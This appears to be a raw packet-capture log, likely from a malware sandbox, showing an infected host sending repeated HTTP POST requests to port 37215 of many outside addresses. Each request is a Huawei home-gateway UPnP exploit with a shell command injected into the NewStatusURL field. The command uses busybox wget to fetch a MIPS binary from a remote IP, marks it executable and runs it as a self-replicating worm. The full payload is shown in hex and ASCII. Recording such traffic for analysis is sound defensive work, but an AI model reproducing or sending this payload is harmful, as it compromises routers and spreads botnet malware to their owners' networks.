                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          384192.168.2.2334948197.48.91.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178946018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          385192.168.2.235393641.183.237.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178958893 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          386192.168.2.234424693.250.199.25237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178965092 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          387192.168.2.234761041.17.217.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178965092 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          388192.168.2.2350452157.53.95.9437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178968906 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          389192.168.2.235853041.42.187.1637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178982973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          390192.168.2.235045241.109.21.14037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.182203054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          391192.168.2.234003841.203.39.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.182203054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          392192.168.2.235378841.27.195.13137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.182240963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          393192.168.2.2356588157.19.254.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.182244062 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
